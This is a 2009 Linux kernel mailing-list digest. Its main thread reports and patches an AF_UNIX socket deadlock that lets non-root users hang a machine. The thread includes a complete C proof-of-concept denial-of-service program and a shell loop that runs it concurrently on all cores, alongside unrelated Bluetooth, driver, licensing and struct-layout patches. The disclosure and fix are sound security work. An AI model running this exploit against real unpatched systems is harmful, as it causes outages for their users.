* Re: [PATCH] AF_UNIX: Fix deadlock on connecting to shutdown socket
From: David Miller @ 2009-10-19 6:18 UTC (permalink / raw)
To: tomoki.sekiyama.qu
Cc: linux-kernel, netdev, alan, satoshi.oshima.fk, hidehiro.kawai.ez,
hideo.aoki.tk
In-Reply-To: <4ADC010C.5070809@hitachi.com>
From: Tomoki Sekiyama <tomoki.sekiyama.qu@hitachi.com>
Date: Mon, 19 Oct 2009 15:02:52 +0900
> I found a deadlock bug in UNIX domain sockets that lets non-root users
> mount a DoS attack against the local machine.
...
> Why this happens:
> Error checks between unix_stream_connect() and unix_wait_for_peer() are
> inconsistent. The former calls the latter to wait until the backlog is
> processed. Although the latter returns without doing anything when the
> socket is shut down, the former doesn't check the shutdown state and
> just retries calling the latter forever.
>
> Patch:
> The patch below adds a shutdown check to unix_stream_connect(), so
> connect(2) to the shut-down socket will return -ECONNREFUSED.
>
> Signed-off-by: Tomoki Sekiyama <tomoki.sekiyama.qu@hitachi.com>
> Signed-off-by: Masanori Yoshida <masanori.yoshida.tv@hitachi.com>
Looks good, applied, thank you!
^ permalink raw reply
* [PATCH] AF_UNIX: Fix deadlock on connecting to shutdown socket
From: Tomoki Sekiyama @ 2009-10-19 6:02 UTC (permalink / raw)
To: linux-kernel, netdev, alan
Cc: davem, satoshi.oshima.fk, hidehiro.kawai.ez, hideo.aoki.tk
Hi,
I found a deadlock bug in UNIX domain sockets that lets non-root users
mount a DoS attack against the local machine.
How to reproduce:
1. Make a listening AF_UNIX/SOCK_STREAM socket with an abstract
namespace(*), and shutdown(2) it.
2. Repeatedly connect(2) to the listening socket from other sockets
until the connection backlog is full.
3. connect(2) takes the CPU forever. If every core is taken, the
system hangs.
PoC code: (Run as many times as cores on SMP machines.)
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/un.h>

int main(void)
{
	int ret;
	int csd;
	int lsd;
	struct sockaddr_un sun;

	/* make an abstract name address (*) */
	memset(&sun, 0, sizeof(sun));
	sun.sun_family = PF_UNIX;
	sprintf(&sun.sun_path[1], "%d", getpid());

	/* create the listening socket and shut it down */
	lsd = socket(AF_UNIX, SOCK_STREAM, 0);
	bind(lsd, (struct sockaddr *)&sun, sizeof(sun));
	listen(lsd, 1);
	shutdown(lsd, SHUT_RDWR);

	/* connect loop */
	alarm(15); /* forcibly exit the loop after 15 sec */
	for (;;) {
		csd = socket(AF_UNIX, SOCK_STREAM, 0);
		ret = connect(csd, (struct sockaddr *)&sun, sizeof(sun));
		if (-1 == ret) {
			perror("connect()");
			break;
		}
		puts("Connection OK");
	}
	return 0;
}
(*) Make sun_path[0] = 0 to use the abstract namespace.
If a file-based socket is used, the system doesn't deadlock because
of context switches in the file system layer.
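A minimal sketch of building such an abstract address follows. The helper
name make_abstract_addr() is hypothetical and not part of the PoC. It leaves
sun_path[0] as 0 and returns an address length that covers only the name
bytes, whereas the PoC passes sizeof(sun), which also works as long as
bind(2) and connect(2) are given the same length.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/un.h>

/*
 * Fill *addr with an abstract-namespace address for `name` and return the
 * length to pass to bind(2) or connect(2), or 0 if the name does not fit.
 * make_abstract_addr() is a hypothetical helper, not a libc function.
 */
static socklen_t make_abstract_addr(struct sockaddr_un *addr, const char *name)
{
    size_t len;

    assert(addr != NULL && name != NULL);
    len = strlen(name);
    if (len == 0 || len > sizeof(addr->sun_path) - 1)
        return 0;

    memset(addr, 0, sizeof(*addr));
    addr->sun_family = AF_UNIX;
    /* sun_path[0] stays '\0': this selects the abstract namespace. */
    memcpy(&addr->sun_path[1], name, len);

    /* Count the family field, the leading NUL, and the name bytes only. */
    return (socklen_t)(offsetof(struct sockaddr_un, sun_path) + 1 + len);
}
```

The returned length would be passed as the third argument of bind(2) and
connect(2) in place of sizeof(sun).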
Why this happens:
Error checks between unix_stream_connect() and unix_wait_for_peer() are
inconsistent. The former calls the latter to wait until the backlog is
processed. Although the latter returns without doing anything when the
socket is shut down, the former doesn't check the shutdown state and
just retries calling the latter forever.
Patch:
The patch below adds a shutdown check to unix_stream_connect(), so
connect(2) to the shut-down socket will return -ECONNREFUSED.
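The retry behaviour described under "Why this happens" can be modeled in
user space. The sketch below is only a model under stated assumptions:
struct model_listener, model_wait_for_peer() and model_connect() are
hypothetical names, nothing here is kernel code, and a retry cap is added
so that the unpatched case terminates.

```c
#include <assert.h>
#include <errno.h>
#include <stdbool.h>
#include <stddef.h>

#define MODEL_RCV_SHUTDOWN 1u   /* stand-in for the kernel's RCV_SHUTDOWN bit */

struct model_listener {
    bool listening;
    unsigned int shutdown;      /* bitmask, playing the role of sk_shutdown */
    int queued;                 /* connections waiting to be accepted */
    int backlog;                /* queue capacity in this model */
};

/* Models the wait: returns at once, with no progress, if the peer is shut down. */
static void model_wait_for_peer(struct model_listener *l)
{
    if (l->shutdown & MODEL_RCV_SHUTDOWN)
        return;
    if (l->queued > 0)
        l->queued--;            /* pretend the listener accepted one while we slept */
}

/* Models the connect path; check_shutdown selects the patched behaviour. */
static int model_connect(struct model_listener *l, bool check_shutdown,
                         int max_retries, int *retries)
{
    assert(l != NULL && retries != NULL);
    *retries = 0;
    for (;;) {
        if (!l->listening)
            return -ECONNREFUSED;
        if (check_shutdown && (l->shutdown & MODEL_RCV_SHUTDOWN))
            return -ECONNREFUSED;
        if (l->queued < l->backlog) {
            l->queued++;
            return 0;
        }
        if (*retries == max_retries)
            return -EAGAIN;     /* model only: the reported loop has no such cap */
        (*retries)++;
        model_wait_for_peer(l);
    }
}
```

With check_shutdown false and a full backlog on a shut-down listener,
model_connect() spins until the cap is hit. With check_shutdown true it
returns -ECONNREFUSED without retrying, which is what the patch aims for.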
Signed-off-by: Tomoki Sekiyama <tomoki.sekiyama.qu@hitachi.com>
Signed-off-by: Masanori Yoshida <masanori.yoshida.tv@hitachi.com>
---
net/unix/af_unix.c | 2 ++
1 files changed, 2 insertions(+), 0 deletions(-)
diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
index 51ab497..fc820cd 100644
--- a/net/unix/af_unix.c
+++ b/net/unix/af_unix.c
@@ -1074,6 +1074,8 @@ restart:
 	err = -ECONNREFUSED;
 	if (other->sk_state != TCP_LISTEN)
 		goto out_unlock;
+	if (other->sk_shutdown & RCV_SHUTDOWN)
+		goto out_unlock;
 
 	if (unix_recvq_full(other)) {
 		err = -EAGAIN;
--
Tomoki Sekiyama
Linux Technology Center
Hitachi, Ltd., Systems Development Laboratory
E-mail: tomoki.sekiyama.qu@hitachi.com
^ permalink raw reply related
* [PATCH 1/2] bluetooth: scheduling while atomic bug fix
From: Dave Young @ 2009-10-19 6:24 UTC (permalink / raw)
To: marcel-kz+m5ild9QBg9hUCZPvPmw
Cc: alan-qBU/x9rampVanCEyBjwyrvXRex20P6io,
oliver-fJ+pQTUTwRTk1uMJSBkQmQ, netdev-u79uwXL29TY76Z2rM5mHXA,
linux-bluetooth-u79uwXL29TY76Z2rM5mHXA,
linux-kernel-u79uwXL29TY76Z2rM5mHXA
Due to driver core changes, dev_set_drvdata() now calls kzalloc(), which may
sleep, but hci_conn_add() is called in atomic context.
As with dev_set_name(), move dev_set_drvdata() to the work queue function.
The oops is as follows:
Oct 2 17:41:59 darkstar kernel: [ 438.001341] BUG: sleeping function called from invalid context at mm/slqb.c:1546
Oct 2 17:41:59 darkstar kernel: [ 438.001345] in_atomic(): 1, irqs_disabled(): 0, pid: 2133, name: sdptool
Oct 2 17:41:59 darkstar kernel: [ 438.001348] 2 locks held by sdptool/2133:
Oct 2 17:41:59 darkstar kernel: [ 438.001350] #0: (sk_lock-AF_BLUETOOTH-BTPROTO_L2CAP){+.+.+.}, at: [<faa1d2f5>] lock_sock+0xa/0xc [l2cap]
Oct 2 17:41:59 darkstar kernel: [ 438.001360] #1: (&hdev->lock){+.-.+.}, at: [<faa20e16>] l2cap_sock_connect+0x103/0x26b [l2cap]
Oct 2 17:41:59 darkstar kernel: [ 438.001371] Pid: 2133, comm: sdptool Not tainted 2.6.31-mm1 #2
Oct 2 17:41:59 darkstar kernel: [ 438.001373] Call Trace:
Oct 2 17:41:59 darkstar kernel: [ 438.001381] [<c022433f>] __might_sleep+0xde/0xe5
Oct 2 17:41:59 darkstar kernel: [ 438.001386] [<c0298843>] __kmalloc+0x4a/0x15a
Oct 2 17:41:59 darkstar kernel: [ 438.001392] [<c03f0065>] ? kzalloc+0xb/0xd
Oct 2 17:41:59 darkstar kernel: [ 438.001396] [<c03f0065>] kzalloc+0xb/0xd
Oct 2 17:41:59 darkstar kernel: [ 438.001400] [<c03f04ff>] device_private_init+0x15/0x3d
Oct 2 17:41:59 darkstar kernel: [ 438.001405] [<c03f24c5>] dev_set_drvdata+0x18/0x26
Oct 2 17:41:59 darkstar kernel: [ 438.001414] [<fa51fff7>] hci_conn_init_sysfs+0x40/0xd9 [bluetooth]
Oct 2 17:41:59 darkstar kernel: [ 438.001422] [<fa51cdc0>] ? hci_conn_add+0x128/0x186 [bluetooth]
Oct 2 17:41:59 darkstar kernel: [ 438.001429] [<fa51ce0f>] hci_conn_add+0x177/0x186 [bluetooth]
Oct 2 17:41:59 darkstar kernel: [ 438.001437] [<fa51cf8a>] hci_connect+0x3c/0xfb [bluetooth]
Oct 2 17:41:59 darkstar kernel: [ 438.001442] [<faa20e87>] l2cap_sock_connect+0x174/0x26b [l2cap]
Oct 2 17:41:59 darkstar kernel: [ 438.001448] [<c04c8df5>] sys_connect+0x60/0x7a
Oct 2 17:41:59 darkstar kernel: [ 438.001453] [<c024b703>] ? lock_release_non_nested+0x84/0x1de
Oct 2 17:41:59 darkstar kernel: [ 438.001458] [<c028804b>] ? might_fault+0x47/0x81
Oct 2 17:41:59 darkstar kernel: [ 438.001462] [<c028804b>] ? might_fault+0x47/0x81
Oct 2 17:41:59 darkstar kernel: [ 438.001468] [<c033361f>] ? __copy_from_user_ll+0x11/0xce
Oct 2 17:41:59 darkstar kernel: [ 438.001472] [<c04c9419>] sys_socketcall+0x82/0x17b
Oct 2 17:41:59 darkstar kernel: [ 438.001477] [<c020329d>] syscall_call+0x7/0xb
Signed-off-by: Dave Young <hidave.darkstar-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org>
---
net/bluetooth/hci_sysfs.c | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
--- linux-2.6.31.orig/net/bluetooth/hci_sysfs.c 2009-10-09 20:50:43.000000000 +0800
+++ linux-2.6.31/net/bluetooth/hci_sysfs.c 2009-10-10 21:24:56.000000000 +0800
@@ -92,6 +92,8 @@ static void add_conn(struct work_struct
dev_set_name(&conn->dev, "%s:%d", hdev->name, conn->handle);
+ dev_set_drvdata(&conn->dev, conn);
+
if (device_add(&conn->dev) < 0) {
BT_ERR("Failed to register connection device");
return;
@@ -144,8 +146,6 @@ void hci_conn_init_sysfs(struct hci_conn
conn->dev.class = bt_class;
conn->dev.parent = &hdev->dev;
- dev_set_drvdata(&conn->dev, conn);
-
device_initialize(&conn->dev);
INIT_WORK(&conn->work_add, add_conn);
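The idea of the fix, keeping anything that may sleep out of the atomic path
and running it from the work function instead, can be illustrated with a
small user-space model. All model_* names are hypothetical, and calloc()
merely stands in for the allocation that the trace shows under
dev_set_drvdata(). This is a sketch, not the driver core or workqueue API.

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>

struct model_work {
    void (*fn)(struct model_work *work);
    struct model_work *next;
};

struct model_private {
    void *driver_data;
};

struct model_conn {
    struct model_work work_add;     /* plays the role of conn->work_add */
    struct model_private *p;        /* allocated lazily, like the device private data */
};

static struct model_work *pending;  /* singly linked list of queued work items */

/* Usable from the "atomic" path: only links the item, never allocates. */
static void model_queue_work(struct model_work *work)
{
    assert(work != NULL && work->fn != NULL);
    work->next = pending;
    pending = work;
}

/* Runs later, in a context where allocating (and sleeping) is allowed. */
static void model_run_pending(void)
{
    while (pending != NULL) {
        struct model_work *w = pending;

        pending = w->next;
        w->fn(w);
    }
}

/* Work function: the allocation happens here, not in the atomic path. */
static void model_add_conn(struct model_work *work)
{
    struct model_conn *conn = (struct model_conn *)
        ((char *)work - offsetof(struct model_conn, work_add));

    conn->p = calloc(1, sizeof(*conn->p));
    if (conn->p != NULL)
        conn->p->driver_data = conn;
}
```

The caller in the atomic path only calls model_queue_work(); the private
data exists once model_run_pending() has run.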
^ permalink raw reply
* [PATCH 2/2] bluetooth: static lock key fix
From: Dave Young @ 2009-10-19 6:28 UTC (permalink / raw)
To: marcel-kz+m5ild9QBg9hUCZPvPmw
Cc: oliver-fJ+pQTUTwRTk1uMJSBkQmQ, netdev-u79uwXL29TY76Z2rM5mHXA,
linux-bluetooth-u79uwXL29TY76Z2rM5mHXA,
linux-kernel-u79uwXL29TY76Z2rM5mHXA
When shutting down a ppp connection, lockdep warns about a non-static key
because the lock has not been initialized properly at that time.
Fix this by adjusting the lock/skb_queue_head init order.
[ 94.339261] INFO: trying to register non-static key.
[ 94.342509] the code is fine but needs lockdep annotation.
[ 94.342509] turning off the locking correctness validator.
[ 94.342509] Pid: 0, comm: swapper Not tainted 2.6.31-mm1 #2
[ 94.342509] Call Trace:
[ 94.342509] [<c0248fbe>] register_lock_class+0x58/0x241
[ 94.342509] [<c024b5df>] ? __lock_acquire+0xb57/0xb73
[ 94.342509] [<c024ab34>] __lock_acquire+0xac/0xb73
[ 94.342509] [<c024b7fa>] ? lock_release_non_nested+0x17b/0x1de
[ 94.342509] [<c024b662>] lock_acquire+0x67/0x84
[ 94.342509] [<c04cd1eb>] ? skb_dequeue+0x15/0x41
[ 94.342509] [<c054a857>] _spin_lock_irqsave+0x2f/0x3f
[ 94.342509] [<c04cd1eb>] ? skb_dequeue+0x15/0x41
[ 94.342509] [<c04cd1eb>] skb_dequeue+0x15/0x41
[ 94.342509] [<c054a648>] ? _read_unlock+0x1d/0x20
[ 94.342509] [<c04cd641>] skb_queue_purge+0x14/0x1b
[ 94.342509] [<fab94fdc>] l2cap_recv_frame+0xea1/0x115a [l2cap]
[ 94.342509] [<c024b5df>] ? __lock_acquire+0xb57/0xb73
[ 94.342509] [<c0249c04>] ? mark_lock+0x1e/0x1c7
[ 94.342509] [<f8364963>] ? hci_rx_task+0xd2/0x1bc [bluetooth]
[ 94.342509] [<fab95346>] l2cap_recv_acldata+0xb1/0x1c6 [l2cap]
[ 94.342509] [<f8364997>] hci_rx_task+0x106/0x1bc [bluetooth]
[ 94.342509] [<fab95295>] ? l2cap_recv_acldata+0x0/0x1c6 [l2cap]
[ 94.342509] [<c02302c4>] tasklet_action+0x69/0xc1
[ 94.342509] [<c022fbef>] __do_softirq+0x94/0x11e
[ 94.342509] [<c022fcaf>] do_softirq+0x36/0x5a
[ 94.342509] [<c022fe14>] irq_exit+0x35/0x68
[ 94.342509] [<c0204ced>] do_IRQ+0x72/0x89
[ 94.342509] [<c02038ee>] common_interrupt+0x2e/0x34
[ 94.342509] [<c024007b>] ? pm_qos_add_requirement+0x63/0x9d
[ 94.342509] [<c038e8a5>] ? acpi_idle_enter_bm+0x209/0x238
[ 94.342509] [<c049d238>] cpuidle_idle_call+0x5c/0x94
[ 94.342509] [<c02023f8>] cpu_idle+0x4e/0x6f
[ 94.342509] [<c0534153>] rest_init+0x53/0x55
[ 94.342509] [<c0781894>] start_kernel+0x2f0/0x2f5
[ 94.342509] [<c0781091>] i386_start_kernel+0x91/0x96
Reported-by: Oliver Hartkopp <oliver-fJ+pQTUTwRTk1uMJSBkQmQ@public.gmane.org>
Signed-off-by: Dave Young <hidave.darkstar-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org>
Tested-by: Oliver Hartkopp <oliver-fJ+pQTUTwRTk1uMJSBkQmQ@public.gmane.org>
---
net/bluetooth/l2cap.c | 9 ++++++---
1 file changed, 6 insertions(+), 3 deletions(-)
--- linux-2.6.31.orig/net/bluetooth/l2cap.c 2009-10-09 08:32:46.000000000 +0800
+++ linux-2.6.31/net/bluetooth/l2cap.c 2009-10-09 08:33:57.000000000 +0800
@@ -555,12 +555,12 @@ static struct l2cap_conn *l2cap_conn_add
conn->feat_mask = 0;
- setup_timer(&conn->info_timer, l2cap_info_timeout,
- (unsigned long) conn);
-
spin_lock_init(&conn->lock);
rwlock_init(&conn->chan_list.lock);
+ setup_timer(&conn->info_timer, l2cap_info_timeout,
+ (unsigned long) conn);
+
conn->disc_reason = 0x13;
return conn;
@@ -783,6 +783,9 @@ static void l2cap_sock_init(struct sock
/* Default config options */
pi->conf_len = 0;
pi->flush_to = L2CAP_DEFAULT_FLUSH_TO;
+ skb_queue_head_init(TX_QUEUE(sk));
+ skb_queue_head_init(SREJ_QUEUE(sk));
+ INIT_LIST_HEAD(SREJ_LIST(sk));
}
static struct proto l2cap_proto = {
^ permalink raw reply
* Re: [PATCH] AF_UNIX: Fix deadlock on connecting to shutdown socket
From: Américo Wang @ 2009-10-19 7:02 UTC (permalink / raw)
To: Tomoki Sekiyama
Cc: linux-kernel, netdev, alan, davem, satoshi.oshima.fk,
hidehiro.kawai.ez, hideo.aoki.tk
In-Reply-To: <4ADC010C.5070809@hitachi.com>
On Mon, Oct 19, 2009 at 2:02 PM, Tomoki Sekiyama
<tomoki.sekiyama.qu@hitachi.com> wrote:
> Hi,
> I found a deadlock bug in UNIX domain sockets that lets non-root users
> mount a DoS attack against the local machine.
>
> How to reproduce:
> 1. Make a listening AF_UNIX/SOCK_STREAM socket with an abstract
> namespace(*), and shutdown(2) it.
> 2. Repeatedly connect(2) to the listening socket from other sockets
> until the connection backlog is full.
> 3. connect(2) takes the CPU forever. If every core is taken, the
> system hangs.
>
> PoC code: (Run as many times as cores on SMP machines.)
Interesting...
I tried this with the following command:
% for i in `seq 1 $(grep processor -c /proc/cpuinfo)`;
do ./unix-socket-dos-exploit; echo "=====$i====";done
Connection OK
Connection OK
=====1====
Connection OK
Connection OK
=====2====
Connection OK
Connection OK
=====3====
Connection OK
Connection OK
=====4====
My system doesn't hang at all.
Am I missing something?
Thanks!
>
> int main(void)
> {
> int ret;
> int csd;
> int lsd;
> struct sockaddr_un sun;
>
> /* make an abstract name address (*) */
> memset(&sun, 0, sizeof(sun));
> sun.sun_family = PF_UNIX;
> sprintf(&sun.sun_path[1], "%d", getpid());
>
> /* create the listening socket and shutdown */
> lsd = socket(AF_UNIX, SOCK_STREAM, 0);
> bind(lsd, (struct sockaddr *)&sun, sizeof(sun));
> listen(lsd, 1);
> shutdown(lsd, SHUT_RDWR);
>
> /* connect loop */
> alarm(15); /* forcibly exit the loop after 15 sec */
> for (;;) {
> csd = socket(AF_UNIX, SOCK_STREAM, 0);
> ret = connect(csd, (struct sockaddr *)&sun, sizeof(sun));
> if (-1 == ret) {
> perror("connect()");
> break;
> }
> puts("Connection OK");
> }
> return 0;
> }
>
> (*) Make sun_path[0] = 0 to use the abstract namespace.
> If a file-based socket is used, the system doesn't deadlock because
> of context switches in the file system layer.
>
> Why this happens:
> Error checks between unix_stream_connect() and unix_wait_for_peer() are
> inconsistent. The former calls the latter to wait until the backlog is
> processed. Although the latter returns without doing anything when the
> socket is shut down, the former doesn't check the shutdown state and
> just retries calling the latter forever.
>
> Patch:
> The patch below adds a shutdown check to unix_stream_connect(), so
> connect(2) to the shut-down socket will return -ECONNREFUSED.
>
> Signed-off-by: Tomoki Sekiyama <tomoki.sekiyama.qu@hitachi.com>
> Signed-off-by: Masanori Yoshida <masanori.yoshida.tv@hitachi.com>
> ---
> net/unix/af_unix.c | 2 ++
> 1 files changed, 2 insertions(+), 0 deletions(-)
>
> diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
> index 51ab497..fc820cd 100644
> --- a/net/unix/af_unix.c
> +++ b/net/unix/af_unix.c
> @@ -1074,6 +1074,8 @@ restart:
> err = -ECONNREFUSED;
> if (other->sk_state != TCP_LISTEN)
> goto out_unlock;
> + if (other->sk_shutdown & RCV_SHUTDOWN)
> + goto out_unlock;
>
> if (unix_recvq_full(other)) {
> err = -EAGAIN;
^ permalink raw reply
* Re: [OT] ntop / GPL (was Re: PF_RING: Include in main line kernel?)
From: Jarek Poplawski @ 2009-10-19 7:12 UTC (permalink / raw)
To: Harald Welte; +Cc: Brad Doctor, netdev, Luca Deri
In-Reply-To: <20091019055521.GA5948@ff.dom.local>
On Mon, Oct 19, 2009 at 05:55:21AM +0000, Jarek Poplawski wrote:
> On Sun, Oct 18, 2009 at 02:47:06PM +0200, Harald Welte wrote:
> > Hi Jarek, Brad, Luca,
> >
> > [putting my gpl-violations.org hat on]
> >
> > On Wed, Oct 14, 2009 at 06:46:11PM +0200, Jarek Poplawski wrote:
> > > Brad Doctor wrote, On 10/14/2009 04:33 PM:
> > >
> > > > Download ntop
> > > >
> > > > ntop is distributed under the GNU GPL. In order to be entitled to download
> > > > ntop you must accept the GNU license.
> > >
> > > I can't find such a thing neither in GNU GPL v2:
> >
> > This is true. The GPL does never need to be accepted for mere use (i.e.
> > running) the program. This is at least true for the continental european
> > copyright systems, where any legally obtained copy of a program implicitly
> > carries the permission for running the program. Only for any other activity
> > you will need to accept the license.
> >
> > but, like others posted in this thread, ntop is not the PF_RING code.
>
> ntop doesn't matter here at all:
Or more precisely: "ntop is not PF_RING code" doesn't matter here,
because it all suggests we have a false statement wrt. PF_RING.
(But Brad acknowledged this needs the change.)
>
> if ((X uses the stock GPL license.) &&
> (Y is distributed under the GNU GPL) &&
> (In order to be entitled to download Y
> you must accept the GNU license.) &&
> (The GPL does never need to be accepted for mere use.))
>
> is logically false.
>
> BTW, legal systems don't matter here at all.
IOW: if this point of the GNU GPL isn't true for some copyright system,
it means the GNU GPL can't be valid in such a system.
Jarek P.
^ permalink raw reply
* Re: [PATCH 1/2] page allocator: Always wake kswapd when restarting an allocation attempt after direct reclaim failed
From: Christoph Lameter @ 2009-10-19 7:40 UTC (permalink / raw)
To: Mel Gorman
Cc: Andrew Morton, stable, Rafael J. Wysocki, David Miller, Frans Pop,
reinette chatre, Kalle Valo, John W. Linville, Pekka Enberg,
Bartlomiej Zolnierkiewicz, Karol Lewandowski, netdev,
linux-kernel, linux-mm@kvack.org
In-Reply-To: <1255689446-3858-2-git-send-email-mel@csn.ul.ie>
Reviewed-by: Christoph Lameter <cl@linux-foundation.org>
^ permalink raw reply
* Re: [PATCH] myri10ge: improve port type reporting in ethtool output
From: Ben Hutchings @ 2009-10-19 8:12 UTC (permalink / raw)
To: Brice Goglin; +Cc: David S. Miller, Linux Network Development list
In-Reply-To: <4ADBFA88.8030300@myri.com>
On Mon, 2009-10-19 at 07:35 +0200, Brice Goglin wrote:
> Improve the reporting of the port type in ethtool,
> update for new boards.
>
> Signed-off-by: Brice Goglin <brice@myri.com>
>
> --- a/drivers/net/myri10ge/myri10ge.c
> +++ b/drivers/net/myri10ge/myri10ge.c
> @@ -75,7 +75,7 @@
> #include "myri10ge_mcp.h"
> #include "myri10ge_mcp_gen_header.h"
>
> -#define MYRI10GE_VERSION_STR "1.5.0-1.432"
> +#define MYRI10GE_VERSION_STR "1.5.1-1.450"
>
> MODULE_DESCRIPTION("Myricom 10G driver (10GbE)");
> MODULE_AUTHOR("Maintainer: help@myri.com");
> @@ -1601,6 +1601,8 @@ myri10ge_get_settings(struct net_device *netdev,
> struct ethtool_cmd *cmd)
> cmd->autoneg = AUTONEG_DISABLE;
> cmd->speed = SPEED_10000;
> cmd->duplex = DUPLEX_FULL;
> + cmd->supported = SUPPORTED_10000baseT_Full;
> + cmd->advertising = ADVERTISED_10000baseT_Full;
[...]
Lying about link modes is not an improvement.
Ben.
--
Ben Hutchings, Senior Software Engineer, Solarflare Communications
Not speaking for my employer; that's the marketing department's job.
They asked us to note that Solarflare product names are trademarked.
^ permalink raw reply
* [PATCH] net: Fix struct inet_timewait_sock bitfield annotation
From: Eric Dumazet @ 2009-10-19 8:48 UTC (permalink / raw)
To: David S. Miller; +Cc: Linux Netdev List
commit 9e337b0f (net: annotate inet_timewait_sock bitfields)
added 4/8 bytes to struct inet_timewait_sock.
Fix this by declaring tw_ipv6_offset in the 'flags' bitfield.
The 14-bit hole is named tw_pad to make it clearly apparent.
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
---
diff --git a/include/net/inet_timewait_sock.h b/include/net/inet_timewait_sock.h
index 37f3aea..b5ad469 100644
--- a/include/net/inet_timewait_sock.h
+++ b/include/net/inet_timewait_sock.h
@@ -130,11 +130,11 @@ struct inet_timewait_sock {
__u16 tw_num;
kmemcheck_bitfield_begin(flags);
/* And these are ours. */
- __u8 tw_ipv6only:1,
- tw_transparent:1;
- /* 14 bits hole, try to pack */
+ unsigned int tw_ipv6only : 1,
+ tw_transparent : 1,
+ tw_pad : 14, /* 14 bits hole */
+ tw_ipv6_offset : 16;
kmemcheck_bitfield_end(flags);
- __u16 tw_ipv6_offset;
unsigned long tw_ttd;
struct inet_bind_bucket *tw_tb;
struct hlist_node tw_death_node;
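The effect on the layout can be checked with a reduced user-space struct.
This is a sketch, assuming that the kmemcheck markers expand to zero-length
int arrays (a GNU C extension) and using only the fields visible in the
hunk. struct tw_before, struct tw_after and tw_bytes_saved() are made-up
names, and the real struct has many more members.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Layout before the fix: 8-bit flags, then a separate 16-bit field. */
struct tw_before {
    uint16_t tw_num;
    int flags_begin[0];         /* assumed expansion of kmemcheck_bitfield_begin(flags) */
    uint8_t tw_ipv6only : 1,
            tw_transparent : 1;
    int flags_end[0];           /* assumed expansion of kmemcheck_bitfield_end(flags) */
    uint16_t tw_ipv6_offset;
    unsigned long tw_ttd;
};

/* Layout after the fix: everything packed into one 32-bit bitfield. */
struct tw_after {
    uint16_t tw_num;
    int flags_begin[0];
    unsigned int tw_ipv6only : 1,
                 tw_transparent : 1,
                 tw_pad : 14,   /* 14 bits hole */
                 tw_ipv6_offset : 16;
    int flags_end[0];
    unsigned long tw_ttd;
};

/* Bytes saved by the new layout on the ABI this is compiled for. */
static size_t tw_bytes_saved(void)
{
    assert(sizeof(struct tw_before) >= sizeof(struct tw_after));
    return sizeof(struct tw_before) - sizeof(struct tw_after);
}
```

The int-aligned end marker pushes the separate 16-bit field into a new
word in the old layout; folding it into the bitfield lets tw_ttd start
right after the markers.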
^ permalink raw reply related
* Re: [PATCH] AF_UNIX: Fix deadlock on connecting to shutdown socket
From: Tomoki Sekiyama @ 2009-10-19 8:54 UTC (permalink / raw)
To: xiyou.wangcong
Cc: linux-kernel, netdev, alan, davem, satoshi.oshima.fk,
hidehiro.kawai.ez, hideo.aoki.tk
In-Reply-To: <2375c9f90910190002m372edafq9a4c95d754640487@mail.gmail.com>
Hi, thanks for testing!
Américo Wang wrote:
> On Mon, Oct 19, 2009 at 2:02 PM, Tomoki Sekiyama
> <tomoki.sekiyama.qu@hitachi.com> wrote:
>> Hi,
>> I found a deadlock bug in UNIX domain sockets that lets non-root users
>> mount a DoS attack against the local machine.
>>
>> How to reproduce:
>> 1. Make a listening AF_UNIX/SOCK_STREAM socket with an abstract
>> namespace(*), and shutdown(2) it.
>> 2. Repeatedly connect(2) to the listening socket from other sockets
>> until the connection backlog is full.
>> 3. connect(2) takes the CPU forever. If every core is taken, the
>> system hangs.
>>
>> PoC code: (Run as many times as cores on SMP machines.)
Sorry for my ambiguous explanation ...
> Interesting...
>
> I tried this with the following command:
>
> % for i in `seq 1 $(grep processor -c /proc/cpuinfo)`;
> do ./unix-socket-dos-exploit; echo "=====$i====";done
<snip>
> My system doesn't hang at all.
>
> Am I missing something?
>
> Thanks!
You should run the ./unix-socket-dos-exploit concurrently, like below:
for i in {1..4} ; do ./unix-socket-dos-exploit & done
# For safety, the PoC code stops after 15 seconds via alarm(15).
--
Tomoki Sekiyama
Linux Technology Center
Hitachi, Ltd., Systems Development Laboratory
E-mail: tomoki.sekiyama.qu@hitachi.com
^ permalink raw reply
* Re: [PATCH] AF_UNIX: Fix deadlock on connecting to shutdown socket
From: Américo Wang @ 2009-10-19 9:06 UTC (permalink / raw)
To: Tomoki Sekiyama
Cc: linux-kernel, netdev, alan, davem, satoshi.oshima.fk,
hidehiro.kawai.ez, hideo.aoki.tk, masanori.yoshida.tv
In-Reply-To: <4ADC2A1D.2090303@hitachi.com>
On Mon, Oct 19, 2009 at 4:58 PM, Tomoki Sekiyama
<tomoki.sekiyama.qu@hitachi.com> wrote:
> Hi, thanks for testing!
>
> Américo Wang wrote:
>> On Mon, Oct 19, 2009 at 2:02 PM, Tomoki Sekiyama
>> <tomoki.sekiyama.qu@hitachi.com> wrote:
>>> Hi,
>>> I found a deadlock bug in UNIX domain sockets that lets non-root users
>>> mount a DoS attack against the local machine.
>>>
>>> How to reproduce:
>>> 1. Make a listening AF_UNIX/SOCK_STREAM socket with an abstract
>>> namespace(*), and shutdown(2) it.
>>> 2. Repeatedly connect(2) to the listening socket from other sockets
>>> until the connection backlog is full.
>>> 3. connect(2) takes the CPU forever. If every core is taken, the
>>> system hangs.
>>>
>>> PoC code: (Run as many times as cores on SMP machines.)
>
> Sorry for my ambiguous explanation ...
>
>> Interesting...
>>
>> I tried this with the following command:
>>
>> % for i in `seq 1 $(grep processor -c /proc/cpuinfo)`;
>> do ./unix-socket-dos-exploit; echo "=====$i====";done
> <snip>
>> My system doesn't hang at all.
>>
>> Am I missing something?
>>
>> Thanks!
>
> You should run the ./unix-socket-dos-exploit concurrently, like below:
>
> for i in {1..4} ; do ./unix-socket-dos-exploit & done
>
> # For safety, the PoC code stops after 15 seconds via alarm(15).
Hmm, you are right.
My system hangs for 10 or more seconds after I did what you said.
Confirmed.
Thanks!
^ permalink raw reply
* Re: [PATCH] Add sk_mark route lookup support for IPv4 listening sockets, and for IPv4 multicast forwarding
From: steve @ 2009-10-19 8:20 UTC (permalink / raw)
